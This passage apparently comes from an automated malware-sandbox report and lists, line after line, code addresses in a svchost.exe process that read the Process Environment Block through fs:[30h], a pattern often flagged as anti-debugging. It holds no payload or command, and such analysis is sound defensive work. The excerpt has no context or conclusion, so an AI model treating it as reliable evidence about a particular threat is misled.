            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B6050 mov eax, dword ptr fs:[00000030h]2_2_036B6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362A020 mov eax, dword ptr fs:[00000030h]2_2_0362A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362C020 mov eax, dword ptr fs:[00000030h]2_2_0362C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C6030 mov eax, dword ptr fs:[00000030h]2_2_036C6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B4000 mov ecx, dword ptr fs:[00000030h]2_2_036B4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]2_2_036D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]2_2_036D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]2_2_036D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]2_2_036D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]2_2_036D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]2_2_036D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]2_2_036D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]2_2_036D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364E016 mov eax, dword ptr fs:[00000030h]2_2_0364E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364E016 mov eax, dword ptr fs:[00000030h]2_2_0364E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364E016 mov eax, dword ptr fs:[00000030h]2_2_0364E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364E016 mov eax, dword ptr fs:[00000030h]2_2_0364E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0362A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036380E9 mov eax, dword ptr fs:[00000030h]2_2_036380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B60E0 mov eax, dword ptr fs:[00000030h]2_2_036B60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362C0F0 mov eax, dword ptr fs:[00000030h]2_2_0362C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036720F0 mov ecx, dword ptr fs:[00000030h]2_2_036720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B20DE mov eax, dword ptr fs:[00000030h]2_2_036B20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036280A0 mov eax, dword ptr fs:[00000030h]2_2_036280A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C80A8 mov eax, dword ptr fs:[00000030h]2_2_036C80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F60B8 mov eax, dword ptr fs:[00000030h]2_2_036F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F60B8 mov ecx, dword ptr fs:[00000030h]2_2_036F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363208A mov eax, dword ptr fs:[00000030h]2_2_0363208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03638770 mov eax, dword ptr fs:[00000030h]2_2_03638770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366674D mov esi, dword ptr fs:[00000030h]2_2_0366674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366674D mov eax, dword ptr fs:[00000030h]2_2_0366674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366674D mov eax, dword ptr fs:[00000030h]2_2_0366674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03630750 mov eax, dword ptr fs:[00000030h]2_2_03630750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BE75D mov eax, dword ptr fs:[00000030h]2_2_036BE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672750 mov eax, dword ptr fs:[00000030h]2_2_03672750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672750 mov eax, dword ptr fs:[00000030h]2_2_03672750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B4755 mov eax, dword ptr fs:[00000030h]2_2_036B4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366C720 mov eax, dword ptr fs:[00000030h]2_2_0366C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366C720 mov eax, dword ptr fs:[00000030h]2_2_0366C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366273C mov eax, dword ptr fs:[00000030h]2_2_0366273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366273C mov ecx, dword ptr fs:[00000030h]2_2_0366273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366273C mov eax, dword ptr fs:[00000030h]2_2_0366273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AC730 mov eax, dword ptr fs:[00000030h]2_2_036AC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366C700 mov eax, dword ptr fs:[00000030h]2_2_0366C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03630710 mov eax, dword ptr fs:[00000030h]2_2_03630710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03660710 mov eax, dword ptr fs:[00000030h]2_2_03660710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036527ED mov eax, dword ptr fs:[00000030h]2_2_036527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036527ED mov eax, dword ptr fs:[00000030h]2_2_036527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036527ED mov eax, dword ptr fs:[00000030h]2_2_036527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BE7E1 mov eax, dword ptr fs:[00000030h]2_2_036BE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036347FB mov eax, dword ptr fs:[00000030h]2_2_036347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036347FB mov eax, dword ptr fs:[00000030h]2_2_036347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363C7C0 mov eax, dword ptr fs:[00000030h]2_2_0363C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B07C3 mov eax, dword ptr fs:[00000030h]2_2_036B07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036307AF mov eax, dword ptr fs:[00000030h]2_2_036307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E47A0 mov eax, dword ptr fs:[00000030h]2_2_036E47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D678E mov eax, dword ptr fs:[00000030h]2_2_036D678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F866E mov eax, dword ptr fs:[00000030h]2_2_036F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F866E mov eax, dword ptr fs:[00000030h]2_2_036F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A660 mov eax, dword ptr fs:[00000030h]2_2_0366A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A660 mov eax, dword ptr fs:[00000030h]2_2_0366A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03662674 mov eax, dword ptr fs:[00000030h]2_2_03662674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364C640 mov eax, dword ptr fs:[00000030h]2_2_0364C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364E627 mov eax, dword ptr fs:[00000030h]2_2_0364E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03666620 mov eax, dword ptr fs:[00000030h]2_2_03666620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03668620 mov eax, dword ptr fs:[00000030h]2_2_03668620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363262C mov eax, dword ptr fs:[00000030h]2_2_0363262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE609 mov eax, dword ptr fs:[00000030h]2_2_036AE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672619 mov eax, dword ptr fs:[00000030h]2_2_03672619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE6F2 mov eax, dword ptr fs:[00000030h]2_2_036AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE6F2 mov eax, dword ptr fs:[00000030h]2_2_036AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE6F2 mov eax, dword ptr fs:[00000030h]2_2_036AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE6F2 mov eax, dword ptr fs:[00000030h]2_2_036AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B06F1 mov eax, dword ptr fs:[00000030h]2_2_036B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B06F1 mov eax, dword ptr fs:[00000030h]2_2_036B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0366A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A6C7 mov eax, dword ptr fs:[00000030h]2_2_0366A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366C6A6 mov eax, dword ptr fs:[00000030h]2_2_0366C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036666B0 mov eax, dword ptr fs:[00000030h]2_2_036666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03634690 mov eax, dword ptr fs:[00000030h]2_2_03634690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03634690 mov eax, dword ptr fs:[00000030h]2_2_03634690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366656A mov eax, dword ptr fs:[00000030h]2_2_0366656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366656A mov eax, dword ptr fs:[00000030h]2_2_0366656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366656A mov eax, dword ptr fs:[00000030h]2_2_0366656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03638550 mov eax, dword ptr fs:[00000030h]2_2_03638550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03638550 mov eax, dword ptr fs:[00000030h]2_2_03638550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640535 mov eax, dword ptr fs:[00000030h]2_2_03640535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640535 mov eax, dword ptr fs:[00000030h]2_2_03640535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640535 mov eax, dword ptr fs:[00000030h]2_2_03640535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640535 mov eax, dword ptr fs:[00000030h]2_2_03640535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640535 mov eax, dword ptr fs:[00000030h]2_2_03640535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640535 mov eax, dword ptr fs:[00000030h]2_2_03640535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E53E mov eax, dword ptr fs:[00000030h]2_2_0365E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E53E mov eax, dword ptr fs:[00000030h]2_2_0365E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E53E mov eax, dword ptr fs:[00000030h]2_2_0365E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E53E mov eax, dword ptr fs:[00000030h]2_2_0365E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E53E mov eax, dword ptr fs:[00000030h]2_2_0365E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C6500 mov eax, dword ptr fs:[00000030h]2_2_036C6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704500 mov eax, dword ptr fs:[00000030h]2_2_03704500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704500 mov eax, dword ptr fs:[00000030h]2_2_03704500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704500 mov eax, dword ptr fs:[00000030h]2_2_03704500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704500 mov eax, dword ptr fs:[00000030h]2_2_03704500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704500 mov eax, dword ptr fs:[00000030h]2_2_03704500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704500 mov eax, dword ptr fs:[00000030h]2_2_03704500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704500 mov eax, dword ptr fs:[00000030h]2_2_03704500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]2_2_0365E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]2_2_0365E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]2_2_0365E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]2_2_0365E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]2_2_0365E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]2_2_0365E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]2_2_0365E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]2_2_0365E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036325E0 mov eax, dword ptr fs:[00000030h]2_2_036325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366C5ED mov eax, dword ptr fs:[00000030h]2_2_0366C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366C5ED mov eax, dword ptr fs:[00000030h]2_2_0366C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E5CF mov eax, dword ptr fs:[00000030h]2_2_0366E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E5CF mov eax, dword ptr fs:[00000030h]2_2_0366E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036365D0 mov eax, dword ptr fs:[00000030h]2_2_036365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A5D0 mov eax, dword ptr fs:[00000030h]2_2_0366A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A5D0 mov eax, dword ptr fs:[00000030h]2_2_0366A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B05A7 mov eax, dword ptr fs:[00000030h]2_2_036B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B05A7 mov eax, dword ptr fs:[00000030h]2_2_036B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B05A7 mov eax, dword ptr fs:[00000030h]2_2_036B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036545B1 mov eax, dword ptr fs:[00000030h]2_2_036545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036545B1 mov eax, dword ptr fs:[00000030h]2_2_036545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03632582 mov eax, dword ptr fs:[00000030h]2_2_03632582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03632582 mov ecx, dword ptr fs:[00000030h]2_2_03632582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03664588 mov eax, dword ptr fs:[00000030h]2_2_03664588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E59C mov eax, dword ptr fs:[00000030h]2_2_0366E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BC460 mov ecx, dword ptr fs:[00000030h]2_2_036BC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365A470 mov eax, dword ptr fs:[00000030h]2_2_0365A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365A470 mov eax, dword ptr fs:[00000030h]2_2_0365A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365A470 mov eax, dword ptr fs:[00000030h]2_2_0365A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]2_2_0366E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]2_2_0366E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]2_2_0366E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]2_2_0366E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]2_2_0366E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]2_2_0366E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]2_2_0366E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]2_2_0366E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EA456 mov eax, dword ptr fs:[00000030h]2_2_036EA456
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362645D mov eax, dword ptr fs:[00000030h]2_2_0362645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365245A mov eax, dword ptr fs:[00000030h]2_2_0365245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362E420 mov eax, dword ptr fs:[00000030h]2_2_0362E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362E420 mov eax, dword ptr fs:[00000030h]2_2_0362E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362E420 mov eax, dword ptr fs:[00000030h]2_2_0362E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362C427 mov eax, dword ptr fs:[00000030h]2_2_0362C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B6420 mov eax, dword ptr fs:[00000030h]2_2_036B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B6420 mov eax, dword ptr fs:[00000030h]2_2_036B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B6420 mov eax, dword ptr fs:[00000030h]2_2_036B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B6420 mov eax, dword ptr fs:[00000030h]2_2_036B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B6420 mov eax, dword ptr fs:[00000030h]2_2_036B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B6420 mov eax, dword ptr fs:[00000030h]2_2_036B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B6420 mov eax, dword ptr fs:[00000030h]2_2_036B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A430 mov eax, dword ptr fs:[00000030h]2_2_0366A430
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03668402 mov eax, dword ptr fs:[00000030h]2_2_03668402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03668402 mov eax, dword ptr fs:[00000030h]2_2_03668402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03668402 mov eax, dword ptr fs:[00000030h]2_2_03668402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036304E5 mov ecx, dword ptr fs:[00000030h]2_2_036304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036364AB mov eax, dword ptr fs:[00000030h]2_2_036364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036644B0 mov ecx, dword ptr fs:[00000030h]2_2_036644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BA4B0 mov eax, dword ptr fs:[00000030h]2_2_036BA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EA49A mov eax, dword ptr fs:[00000030h]2_2_036EA49A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362CB7E mov eax, dword ptr fs:[00000030h]2_2_0362CB7E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E4B4B mov eax, dword ptr fs:[00000030h]2_2_036E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E4B4B mov eax, dword ptr fs:[00000030h]2_2_036E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03702B57 mov eax, dword ptr fs:[00000030h]2_2_03702B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03702B57 mov eax, dword ptr fs:[00000030h]2_2_03702B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03702B57 mov eax, dword ptr fs:[00000030h]2_2_03702B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03702B57 mov eax, dword ptr fs:[00000030h]2_2_03702B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C6B40 mov eax, dword ptr fs:[00000030h]2_2_036C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C6B40 mov eax, dword ptr fs:[00000030h]2_2_036C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FAB40 mov eax, dword ptr fs:[00000030h]2_2_036FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D8B42 mov eax, dword ptr fs:[00000030h]2_2_036D8B42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03628B50 mov eax, dword ptr fs:[00000030h]2_2_03628B50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DEB50 mov eax, dword ptr fs:[00000030h]2_2_036DEB50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365EB20 mov eax, dword ptr fs:[00000030h]2_2_0365EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365EB20 mov eax, dword ptr fs:[00000030h]2_2_0365EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F8B28 mov eax, dword ptr fs:[00000030h]2_2_036F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F8B28 mov eax, dword ptr fs:[00000030h]2_2_036F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704B00 mov eax, dword ptr fs:[00000030h]2_2_03704B00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]2_2_036AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]2_2_036AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]2_2_036AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]2_2_036AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]2_2_036AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]2_2_036AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]2_2_036AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]2_2_036AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]2_2_036AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03638BF0 mov eax, dword ptr fs:[00000030h]2_2_03638BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03638BF0 mov eax, dword ptr fs:[00000030h]2_2_03638BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03638BF0 mov eax, dword ptr fs:[00000030h]2_2_03638BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365EBFC mov eax, dword ptr fs:[00000030h]2_2_0365EBFC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BCBF0 mov eax, dword ptr fs:[00000030h]2_2_036BCBF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03650BCB mov eax, dword ptr fs:[00000030h]2_2_03650BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03650BCB mov eax, dword ptr fs:[00000030h]2_2_03650BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03650BCB mov eax, dword ptr fs:[00000030h]2_2_03650BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03630BCD mov eax, dword ptr fs:[00000030h]2_2_03630BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03630BCD mov eax, dword ptr fs:[00000030h]2_2_03630BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03630BCD mov eax, dword ptr fs:[00000030h]2_2_03630BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DEBD0 mov eax, dword ptr fs:[00000030h]2_2_036DEBD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640BBE mov eax, dword ptr fs:[00000030h]2_2_03640BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640BBE mov eax, dword ptr fs:[00000030h]2_2_03640BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E4BB0 mov eax, dword ptr fs:[00000030h]2_2_036E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E4BB0 mov eax, dword ptr fs:[00000030h]2_2_036E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366CA6F mov eax, dword ptr fs:[00000030h]2_2_0366CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366CA6F mov eax, dword ptr fs:[00000030h]2_2_0366CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366CA6F mov eax, dword ptr fs:[00000030h]2_2_0366CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DEA60 mov eax, dword ptr fs:[00000030h]2_2_036DEA60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036ACA72 mov eax, dword ptr fs:[00000030h]2_2_036ACA72
